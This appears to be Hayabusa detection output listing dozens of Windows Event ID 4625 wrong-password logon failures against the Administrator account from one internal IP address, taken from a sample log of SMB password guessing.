2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ugHUJZuKHYfUHXWS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AUeUmYa72BzHfyhK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ksydur7W1mUoOZAE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YNIzopnsXH6OjcUs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SQljJkaWs8bcaOI1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1jejn6ZMo564m7ok  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KrpBO1SCHpt27CRM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ifPePsozBYRLCU3k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vve4r8QwaMLKrrcX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i9ArElR5k8yLefWu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4a1Y126C516BaGcz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VL7PnrO2dLsEbebQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GGTlLZ8J9f2PtiuL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6sVwPFs7bhJgJwRt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dgQNHL9etdHdRw9Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mjZrWpJlN2CwbxFc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 72lmrp6neWGKAURB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CnTi5dgoWunYutJ9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Vi2fTl07llsJEYyt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Hohh8KS1eYtojEya  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RsuC8F95UmsOSKvs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: be8UJ0EN7XS5r0b6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CgJlVYanwWKAhJ7O  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zthqCIkr1nKtqcCj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tzmi8I402j71q5Wg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m0U3NYl8QEbgeJry  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uJJ1FOUIBInGkKPQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bu0X5RisszAHEs0X  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5ZZfs8zqT2bLOAHq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qkpO31LzJfaYLyjB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BJrIsRTWUwPuySR7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VHNccqtwl9Y9IhLq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: APlvDcMzvms0gehT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AxOERGKI75RarVNZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uvzwd5qqC7og49yW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lksm3o2g0YhFnm4Z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zwXhSPCV4qHVF9Rc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: z31baZ4G36idFMeX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WK63qylKunHZB3zS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ALJxKGwyZz7JDpRg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q8tioTO3TEIzdzY0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5dIKTgQkvPKzKJoZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ta0IMrlArbgONhDG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MKNUu4624Rvr87kK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n7jIL2FkXzWqvWTJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oJMVh1zdQt7EikVj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5OqvximSAPlXZ3An  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tr2GQ1F3jccpWrsm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CCmbvQXXXzhHOdMG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qTp1BwPv8XiK2mrG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rnb19AXxM5ArcLxX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EUS5CKq2W1rkq46d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FzKSUVdsC5eENWDd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QFL07Mhy4iw5psBq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cMpitnzLXDLSXL73  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RSfaPdcsiRQoGYYm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PJRP4bS9Qgg06Z5P  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3Z4veMNKngHUDoRf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MmF0YFgAMSRotb1y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DmrbO3dZw46DgmZQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Qg4CMwLpfzLrvDPj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BKDKUXNNhuSqRiTE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cBocrjNXjmuPCKRJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: loCrAXibgVxcOtCM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mZ7pHOJeOExrON2E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MeucKpaodpmdsqhD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LRlmBeBlV6n4MQyo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E8FYOF6HxJHqm7GW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9tBtz1GYn5J8sbFH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Qn8PlxEzIu9AKUgt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QdjqlNDU3U150UAw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: esaTfuwuiFAkIVs6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y4LbVQ5ytgVCqFmL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
